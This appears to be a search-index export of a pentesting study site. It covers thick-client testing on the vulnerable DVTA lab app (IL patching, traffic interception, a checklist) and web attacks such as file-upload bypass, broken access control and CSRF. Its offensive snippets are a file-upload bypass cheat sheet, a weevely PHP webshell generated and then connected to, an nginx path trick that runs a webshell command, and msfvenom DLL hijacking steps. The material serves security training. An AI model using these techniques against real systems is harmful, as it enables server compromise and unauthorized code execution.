              ilasm (IL assembler) and ldasm (il disasembler) are tools provided by Microsoft in Visual Studio.

              We will use ILDASM to disasembler the DVTA application

              C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\ildasm.exe\n

              And ILASM to assemble again the application:

              C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe\n

              1. Open DVTA.exe with ILDASM.exe from command line:

              2. Dump the folder. FILES> Dump

              3. Save that dumped code (which will be IL) into a folder. Close the ILDASM application. The folder generated contains the IL code. There is an specific file called DVTA.il

              4. Open DVTA.il in a text editor and modify the instruction you want to modify. In our case we will change \"ldc.i4.1\" to \"ldc.i4.0\".

              5. From command line, we will use ILASM to assemble that DVTA.il file into a new application

              cd C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\n.\\ilasm.exe C:\\User\\lala\\Desktop\\RE\\DVTA.il\n
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#anti-piracy-measures-implemented-by-some-apps","title":"Anti piracy measures implemented by some apps","text":"

              Mechanism to track or prevent illegitimate copying or usage of the software:

              • Does the app use serial keys, or License Keys to ensure that only allowed number of users can load and operate the software?
              • Does the application stop operating after the expiration of license or serial key?
              • \u2022 Tracking back the legitimate and illegitimate usage of the application
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-traffic-analysis/","title":"Traffic analysis - Thick client Applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#tools-needed","title":"Tools needed","text":"
              • BurpSuite
              • Echo mirage, very old and not maintained.
              • mitm_relay
              • Wireshark

              Difficult part here is when the thick app is not using http/https protocol. In that case, BurpSuite alone is out of consideration and we will need to use:

              • wireshark, it's ok if we just want to monitor.
              • Echo mirage, very old and not maintained.
              • mitm_relay + BurpSuite.
              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-wireshark","title":"Traffic monitoring with Wireshark","text":"

              1. We make sure that port 21 is listening in the Filezilla Server.

              And we start the capture with Wireshark. We will open DVTA with admin credentials and we will click on \"Back up Data to the FTP Server\". If we filter the capture in wireshark leaving only FTP traffic we will be able to retrieve user and password in plain text:

              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-echo-mirage","title":"Traffic monitoring with Echo mirage","text":"

              1. Open Echo Mirage and add a rule to intercept all inbound and outbound traffic in port 21.

              2. In TAB \"Process\" > Inject, and select the application.

              3. In the vulnerable app DVTA login as admin and click on action \"Backup Data to FTP Server\". Now in Echo Mirage you will be intercepting the traffic. This way we can capture USER and PASSWORD:

              Also, modifying the payload you will be tampering the request.

              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-mitm_relay-burpsuite","title":"Traffic monitoring with mitm_relay + Burpsuite","text":"

              In DVTA we will configure the server to the IP of the local machine. In my lab setup, my IP was 10.0.2.15.

              In FTP, we will configure the listening port to 2111. Also, we will disable IP check for this lab setup to work.

              From https://github.com/jrmdev/mitm_relay:

              This is what we're doing:

              1. DVTA application sends traffic to port 21, so to intercept it we configure MITM_relay to be listening on port 21.

              2. mitm_relay encapsulates the application traffic (no matter the protocol) into HTTP protocol so BurpSuite can read it.

              3. Burp Suite will read the traffic. And we can tamper here our code.

              4. mitm_relay will \"unfunnel\" the traffic from the HTPP protocol into the raw one.

              5. In a lab setup FTP server will be in the same network, so to not get in conflict with mitm_relay we will modify FTP listen port to 2111. In real life this change is not necessary

              Running mitm_relay:

              python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l listening address for mitm_relay (0.0.0.0 means we all listening in all interfaces)\n# -r relay configuration: <protocol>:<listeningPort>:<IPofDestinationserver>:<listeningPortonDestinationServer>\n# -p Proxy configuration: <IPofProxy>:<portOfProxy> \n

              And this is how the interception looks like:

              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/thick-application-checklist/","title":"Thick client Applications Pentesting Checklist","text":"

              Source

              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#information-gathering","title":"Information gathering","text":"
              **Information Gathering**\n\n- [ ]  Find out the application architecture (two-tier or three-tier)\n- [ ]  Find out the technologies used (languages and frameworks)\n- [ ]  Identify network communication\n- [ ]  Observe the application process\n- [ ]  Observe each functionality and behavior of the application\n- [ ]  Identify all the entry points\n- [ ]  Analyze the security mechanism (authorization and authentication)\n\n**Tools Used**\n\n- [ ]  CFF Explorer\n- [ ]  Sysinternals Suite\n- [ ]  Wireshark\n- [ ]  PEid\n- [ ]  Detect It Easy (DIE)\n- [ ]  Strings\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#gui-testing","title":"GUI testing","text":"
              **Test For GUI Object Permission**\n\n- [ ]  Display hidden form object\n- [ ]  Try to activate disabled functionalities\n- [ ]  Try to uncover the masked password\n\n**Test GUI Content**\n\n- [ ]  Look for sensitive information\n\n**Test For GUI Logic**\n\n- [ ]  Try for access control and injection-based vulnerabilities\n- [ ]  Bypass controls by utilizing intended GUI functionality\n- [ ]  Check improper error handling\n- [ ]  Check weak input sanitization\n- [ ]  Try privilege escalation (unlocking admin features to normal users)\n- [ ]  Try payment manipulation\n\n**Tools Used**\n\n- [ ]  UISpy\n- [ ]  Winspy++\n- [ ]  Window Detective\n- [ ]  Snoop WPF\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#file-testing","title":"File testing","text":"
              **Test For Files Permission**\n\n- [ ]  Check permission for each and every file and folder\n\n**Test For File Continuity**\n\n- [ ]  Check strong naming\n- [ ]  Authenticate code signing\n\n**Test For File Content Debugging**\n\n- [ ]  Look for sensitive information on the file system (symbols, sensitive data, passwords, configurations)\n- [ ]  Look for sensitive information on the config file\n- [ ]  Look for Hardcoded encryption data\n- [ ]  Look for Clear text storage of sensitive data\n- [ ]  Look for side-channel data leakage\n- [ ]  Look for unreliable log\n\n**Test For File And Content Manipulation**\n\n- [ ]  Try framework backdooring\n- [ ]  Try DLL preloading\n- [ ]  Perform Race condition check\n- [ ]  Test for Files and content replacement\n- [ ]  Test for Client-side protection bypass using reverse engineering\n\n**Test For Function Exported**\n\n- [ ]  Try to find the exported functions\n- [ ]  Try to use the exported functions without authentication\n\n**Test For Public Methods**\n\n- [ ]  Make a wrapper to gain access to public methods without authentication\n\n**Test For Decompile And Application Rebuild**\n\n- [ ]  Try to recover the original source code, passwords, keys\n- [ ]  Try to decompile the application\n- [ ]  Try to rebuild the application\n- [ ]  Try to patch the application\n\n**Test For Decryption And DE obfuscation**\n\n- [ ]  Try to recover original source code\n- [ ]  Try to retrieve passwords and keys\n- [ ]  Test for lack of obfuscation\n\n**Test For Disassemble and Reassemble**\n\n- [ ]  Try to build a patched assembly\n\n**Tools Used**\n\n- [ ]  Strings\n- [ ]  dnSpy\n- [ ]  Procmon\n- [ ]  Process Explorer\n- [ ]  Process Hacker\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#registry-testing","title":"REGISTRY TESTING","text":"
              **Test For Registry Permissions**\n\n- [ ]  Check read access to the registry keys\n- [ ]  Check to write access to the registry keys\n\n**Test For Registry Contents**\n\n- [ ]  Inspect the registry contents\n- [ ]  Check for sensitive info stored on the registry\n- [ ]  Compare the registry before and after executing the application\n\n**Test For Registry Manipulation**\n\n- [ ]  Try for registry manipulation\n- [ ]  Try to bypass authentication by registry manipulation\n- [ ]  Try to bypass authorization by registry manipulation\n\n**Tools Used**\n\n- [ ]  Regshot\n- [ ]  Procmon\n- [ ]  Accessenum\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#network-testing","title":"NETWORK TESTING","text":"
              **Test For Network**\n\n- [ ]  Check for sensitive data in transit\n- [ ]  Try to bypass firewall rules\n- [ ]  Try to manipulate network traffic\n\n**Tools Used**\n\n- [ ]  Wireshark\n- [ ]  TCPview\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#assembly-testing","title":"ASSEMBLY TESTING","text":"
              **Test For Assembly**\n\n- [ ]  Verify Address Space Layout Randomization (ASLR)\n- [ ]  Verify SafeSEH\n- [ ]  Verify Data Execution Prevention (DEP)\n- [ ]  Verify strong naming\n- [ ]  Verify ControlFlowGuard\n- [ ]  Verify HighentropyVA\n\n**Tools Used**\n\n- [ ]  PESecurity\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#memory-testing","title":"MEMORY TESTING","text":"
              **Test For Memory Content**\n\n- [ ]  Check for sensitive data stored in memory\n\n**Test For Memory Manipulation**\n\n- [ ]  Try for memory manipulation\n- [ ]  Try to bypass authentication by memory manipulation\n- [ ]  Try to bypass authorization by memory manipulation\n\n**Test For Run Time Manipulation**\n\n- [ ]  Try to analyze the dump file\n- [ ]  Check for process replacement\n- [ ]  Check for modifying assembly in the memory\n- [ ]  Try to debug the application\n- [ ]  Try to identify dangerous functions\n- [ ]  Use breakpoints to test each and every functionality\n\n**Tools Used**\n\n- [ ]  Process Hacker\n- [ ]  HxD\n- [ ]  Strings\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#traffic-testing","title":"TRAFFIC TESTING","text":"
              **Test For Traffic**\n\n- [ ]  Analyze the flow of network traffic\n- [ ]  Try to find sensitive data in transit\n\n**Tools Used**\n\n- [ ]  Echo Mirage\n- [ ]  MITM Relay\n- [ ]  Burp Suite\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#common-vulnerabilities-testing","title":"COMMON VULNERABILITIES TESTING","text":"
              **Test For Common Vulnerabilities**\n\n- [ ]  Try to decompile the application\n- [ ]  Try for reverse engineering\n- [ ]  Try to test with OWASP WEB Top 10\n- [ ]  Try to test with OWASP API Top 10\n- [ ]  Test for DLL Hijacking\n- [ ]  Test for signature checks (Use Sigcheck)\n- [ ]  Test for binary analysis (Use Binscope)\n- [ ]  Test for business logic errors\n- [ ]  Test for TCP/UDP attacks\n- [ ]  Test with automated scanning tools (Use Visual Code Grepper - VCG)\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#shaped-by-hariprasaanth-r","title":"Shaped by: Hariprasaanth R","text":"

              Reach Me: LinkedIn Portfolio Github

              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/tools-for-thick-apps/","title":"Tools for pentesting thick client applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#decompilation-tools","title":"Decompilation tools","text":"
              • C++ decompilation: https://ghidra-sre.org
              • C# decompilation: dnspy.
              • JetBrains dotPeek.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#read-app-metadata","title":"Read app metadata","text":"
              • CFF explorer. Open the app with CFF Explorer to see which language and tool was used for its creation.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#sniff-connections","title":"Sniff connections","text":"
              • TCP View from sysInternalsSuite.
              • Wireshark.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#traffic-monitoring","title":"Traffic monitoring","text":"
              • wireshark, it's ok if we just want to monitor.
              • Echo mirage, very old and not maintained.
              • mitm_relay + BurpSuite.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#static-analysis","title":"Static analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-hard-coded-credentials","title":"Spot hard coded credentials","text":"
              • Strings from sysInternalsSuite. It's similar to the command \"strings\" in bash. It displays all the human readable strings in a binary.
              • dnspy can be used to spot functions containing hard coded credentials (for connections,...).
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#log-analysis","title":"Log analysis","text":"

              When debug mode is on, you can run:

              thick-app-name.exe > path/to/logs.txt\n
              Open the file with the logs of the application and, if you are lucky and debug mode is still on, you will be able to see some stuff such as SQL queries, decrypted database passwords, users, temp location of the ftp file...

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dynamic-analysis","title":"Dynamic analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#changes-in-the-file-system","title":"Changes in the file system","text":"
              • ProcessMonitor tool from sysInternalsSuite to see changes in the file system. For instance, you can analyze the access to interesting files in the application directory in real time.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-sensitive-data-in-registry-entries","title":"Spot sensitive data in Registry entries","text":"
              • ProcessMonitor tool from sysInternalsSuite to spot changes in the Registry Entries.
              • regshot allows you to compare two snapshots of registry entries (before opening the application and during executing the application).
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#check-the-memory","title":"Check the memory","text":"

              Process Hacker tool During a a connection to database the code that does it may be in clear text or encrypted. If encrypted, it's still possible to find it in memory. Process Hacker tool dumps the memory of the process so we might find the clear text connection string in memory.

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#scan-the-application","title":"Scan the application","text":"

              Visual Code grepper.

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#attacks","title":"Attacks","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dll-hickjacking","title":"DLL Hickjacking","text":"

              Step by step.

              1. Locate interesting DLL files with ProcessMonitor (or ProcMon).

              2. Craft malicious DLL with msfvenom from attacker machine.

              3. Serve it to the victime machine using an apache server.

              4. Placing the file in the same directory from where is going to be called.

              5. Run the app.

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#reversing-net-applications","title":"Reversing .NET applications","text":"
              • dnspy: c# code + IL code + patching the application
              • dotPeek (from JetBrains)
              • ILspy / Reflexil
              • ILASM (IL Assembler) (comes with .NET Framework).
              • ILDASM (IL Disassembler) (comes with Visual Studio).

              How to do it?

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#input-sanitization-sql-injections","title":"Input sanitization: SQL injections","text":"

              Manually

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#application-signing","title":"Application Signing","text":"

              Sigcheck, from SysInternals Suite (more).

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#compiler-protection","title":"Compiler protection","text":"

              Binscope.

              PESecurity is a powershell script that checks if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.

              Also, check these other tools and resources:

              • WinSpy.
              • Window Detective
              • netspi.com.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"webexploitation/","title":"Web exploitation guide","text":"OWASP Attack Tools Payloads WSTG-INPV-12 Command injection attack
              • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection.
              • CRLF attack - Carriage Return and LineFeed attack
                • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection.
                • WSTG-SESS-05 CSRF attack - Cross Site Request Forgery attack BurpSuite, CSRFTester
                  • PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection.
                  • OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
                  • Portswigger: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
                  • Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
                  • Directory traversal attack LFI attack - Local File Inclusion attack Remote Code Execution RFD attack - Reflected File Download attack Reflected File Download Checker - Burp Extension RFI attack - Remote File Inclusion attack Session Puzzling XSS-Me SSRF attack - Server Side Request Forgery Burp Collaborator, Burp Intruder, manually Built-in lists in Burp WSTG-INPV-05 SQL injection Cheat sheet for manual attack, sqlmap Payloads from my dictionary repo XFS attack - Cross-frame Scripting attack WSTG-INPV-01 WSTG-INPV-02 WSTG-CLNT-01 XSS attack - Cross-Site Scripting attack beef, XSSer, Easy-XSS, Manual testing, XSSMe tool on github
                    • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
                    • https://github.com/payloadbox/xss-payload-list
                    • https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626

                    Public exploits

                    We can use these resources: - searchsploit - ExploitDB. - Rapid7.com. - Vulnerability Lab. - metasploit: check verification scripts to test the existence of a vulnerability.

                    ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"webexploitation/arbitrary-file-upload/","title":"Arbitrary File Upload","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

                    ID Link to Hackinglife Link to OWASP Description 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures. 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed.

                    An arbitrary file upload vulnerability is a type of security flaw in web applications that allows an attacker to upload and execute malicious files on a web server. This can have serious consequences, including unauthorized access to sensitive data, server compromise, and even complete system control. The vulnerability arises when the application fails to properly validate and secure the uploaded files. This means that the application may not check if the uploaded file is actually of the expected type (e.g., image, PDF), or it may not restrict the file's location or execution on the server.

                    Exploitation: An attacker identifies the file upload functionality in the target application and attempts to upload a malicious file. This file can be crafted to include malicious code, such as PHP scripts, shell commands, or malware.

                    Bypassing Validation: If the application doesn't properly validate file types or restricts file locations, the attacker can upload a file with a misleading extension (e.g., uploading a PHP file with a .jpg extension).

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-file-upload-restrictions","title":"Bypass file upload restrictions","text":"

                    Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#cheat-sheet-for-php","title":"Cheat sheet for php","text":"

                    Source: Repo from imran-parray OWASP deep explanation: link

                    # try to upload a simple php file\nupload.php \n\n# To bypass the blacklist.\nupload.php.jpeg \n\n# To bypass the blacklist.\nupload.jpg.php\n#  and Then Change the content type of the file to image or jpeg.\nupload.php \n\n# version - 1 2 3 4 5 6 7\nupload.php*\n\n# To bypass The BlackList\nupload.PHP \nupload.PhP \nupload.pHp \n\n#  By uploading this [jpg,png] files can be executed as php with malicious code within it.\nupload .htaccess\n\n# To test againt the DOS.\npixelFlood.jpg\n\n#  upload gif file with 10^10 Frames\nframeflood.gif\n\n# upload UBER.jpg\nMalicious zTXT \n\n# Add backdoor in comments using Exiftool and \nupload.php [getimagesize() \n# rename the jpg file with php so that it will be execute. This Time The Verification of server is only limited to contents of the uploaded file not on the extension\n\n# backdoor in php chunks\nphppng.png \n\n# backdoor in php chunks \nxsspng.png \n
                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#execute-a-file-uploaded-as-an-image-in-nginx","title":"Execute a file uploaded as an image in nginx","text":"

                    After bypassing a file upload feature (using .jpg extension but php mimetype), the file is treated by the application as an image.

                    How to bypass that situation? This works in some versions of nginx server:

                    # After the name of the file with the jpg extension, add slash and the name of the file with the uploaded and accepted mimetype php. After that you can use the CMD command of the webshell.\n\nhttps://example.com/uploads/lolo.jpg/lolo.php?cmd=pwd\n

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#tools","title":"Tools","text":"

                    Generate a php webshell with Weevely and saving it an image:

                    weevely generate secretpassword example.png \n

                    Upload it to the application.

                    Make the connection with weevely:

                    weevely https://example.com/uploads/example.jpg/example.php secretpassword\n

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-php-version-based-file-extension-filters-when-running-the-file","title":"Bypass PHP version-based file extension filters when running the file","text":"

                    Sometimes a web server may prevent some php files from running based on their php version. A way of bypassing this situation is indicating in the extension of the file, the version you want to upload.

                    shell.php7\n

                    In this case, the uploaded file could be executed in php v7.

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/broken-access-control/","title":"Broken access control","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

                    ID Link to Hackinglife Link to OWASP Description 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser)

                    Access control\u00a0determines whether the user is allowed to carry out the action that they are attempting to perform. In the context of web applications, access control is dependent on authentication and session management.

                    • Authentication\u00a0confirms that the user is who they say they are.
                    • Session management\u00a0identifies which subsequent HTTP requests are being made by that same user.

                    Types of broken access control:

                    • Vertical access control: a regular user can access or perform operations on endpoints reserved to admins.
                    • Horizontal access control: a regular user can access resources or perform operations on other users.
                    • Context-dependent access control: Context-dependent access controls restrict access to functionality and resources based upon the state of the application or the user's interaction with it. For example, a retail website might prevent users from modifying the contents of their shopping cart after they have made payment.
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#exploitation","title":"Exploitation","text":"

                    This is how you usually test these vulnerabilities:

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#unprotected-functionality","title":"Unprotected functionality","text":"

                    At its most basic, vertical privilege escalation arises where an application does not enforce any protection for sensitive functionality. Example: accessing /admin panel (or a less obvious url for the admin functionality.)

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#parameter-based-access-control-methods","title":"Parameter-based access control methods","text":"

                    When the application makes access control decisions based on a submitted value.

                    https://insecure-website.com/login/home.jsp?admin=true\n

                    This approach is insecure because a user can modify the value and access functionality they're not authorized to, such as administrative functions. In the following example, I'm the user wiener, but I can access to user carlos information by modifying the parameter id in the request:

                    GET /my-account?id=carlos HTTP/2\n

                    For GUID and obfuscated parameters, you can chain a data exposure vulnerability with this. Also, an IDOR.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-override-methods","title":"URL override methods","text":"

                    There are\u00a0various non-standard HTTP headers that can be used to override the URL in the original request, such as\u00a0X-Original-URL\u00a0and\u00a0X-Rewrite-URL.

                    If a website uses rigorous front-end controls to restrict access based on the URL, but the application allows the URL to be overridden via a request header, then:

                    POST / HTTP/1.1\nHost: target.com\nX-Original-URL: /admin/deleteUser \n...\n
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-matching-discrepancies","title":"URL-matching discrepancies","text":"

                    Websites can vary in how strictly they match the path of an incoming request to a defined endpoint.

                    • For example, they may tolerate inconsistent capitalization, so a request to\u00a0/ADMIN/DELETEUSER\u00a0may still be mapped to the\u00a0/admin/deleteUser\u00a0endpoint. If the access control mechanism is less tolerant, it may treat these as two different endpoints and fail to enforce the correct restrictions as a result.
                    • Spring framework with useSuffixPatternMatch\u00a0option enabled allows paths with an arbitrary file extension to be mapped to an equivalent endpoint with no file extension.
                    • On other systems, you may encounter discrepancies in whether\u00a0/admin/deleteUser\u00a0and\u00a0/admin/deleteUser/
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#idors","title":"IDORS","text":"

                    IDORs occur if an application uses user-supplied input to access objects directly and an attacker can modify the input to obtain unauthorized access.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#abusing-referer-request-header","title":"Abusing Referer Request header","text":"

                    The\u00a0Referer\u00a0header can be added to requests by browsers to indicate which page initiated a request.

                    For example, an application robustly enforces access control over the main administrative page at\u00a0/admin, but for sub-pages such as\u00a0/admin/deleteUser\u00a0only inspects the\u00a0Referer\u00a0header. If the\u00a0Referer\u00a0header contains the main\u00a0/admin\u00a0URL, then the request is allowed.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#other-headers-to-consider-for-location-base-control","title":"Other Headers to Consider for location-base control","text":"

                    Often admin panels or administrative related bits of functionality are only accessible to clients on local networks, therefore it may be possible to abuse various proxy or forwarding related HTTP headers to gain access. Some headers and values to test with are:

                    • Headers:
                      • X-Forwarded-For
                      • X-Forward-For
                      • X-Remote-IP
                      • X-Originating-IP
                      • X-Remote-Addr
                      • X-Client-IP
                    • Values
                      • 127.0.0.1\u00a0(or anything in the\u00a0127.0.0.0/8\u00a0or\u00a0::1/128\u00a0address spaces)
                      • localhost
                      • Any\u00a0RFC1918\u00a0address:
                        • 10.0.0.0/8
                        • 172.16.0.0/12
                        • 192.168.0.0/16
                      • Link local addresses:\u00a0169.254.0.0/16
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/buffer-overflow/","title":"Buffer Overflow attack","text":"

                    A buffer is an area in the RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce buffer\u2019s limits, an attacker could find a way to write data beyond those limits.

                    A stack is a data structure used to store the data. Two approaches: LIFO and FIFO Two methods: push (adds elements to the stack) and pop (removes elements from the stack)

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/captcha-replay-attack/","title":"Captcha Replay attack","text":"

                    Captcha replay attack is a vulnerability in which the Captcha validation system accepts old Captcha values which have already expired. This is sometimes considered legitimate behavior (as would be expected if the user refreshed the browser after submitting a successful captcha), however in many cases, such functionality would make the captcha significantly less effective at preventing automation.

                    In this case, the attacker resubmitted a request that had already been successfully validated through a captcha, and \"replay\" was explicitly disabled for the captcha. This is not necessarily a malicious incident on its own, because the user can have accidentally refreshed the browser, however multiple attempts would definitely represent malicious intent.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/","title":"Carriage Return and Linefeed - CRLF Attack","text":"

                    Source: Owasp description: https://owasp.org/www-community/vulnerabilities/CRLF_Injection.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#description","title":"Description","text":"

                    A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. CRLF is the acronym used to refer to Carriage Return (\\r) Line Feed (\\n). As one might notice from the symbols in the brackets, \u201cCarriage Return\u201d refers to the end of a line, and \u201cLine Feed\u201d refers to the new line.

                    The term CRLF refers to Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, \\n). They\u2019re used to note the termination of a line, however, dealt with differently in today\u2019s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/","title":"XFS attack - Cross-frame Scripting","text":"","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-site-request-forgery-csrf/","title":"CSRF attack - Cross Site Request Forgery","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

                    ID Link to Hackinglife Link to OWASP Description 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token.

                    Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

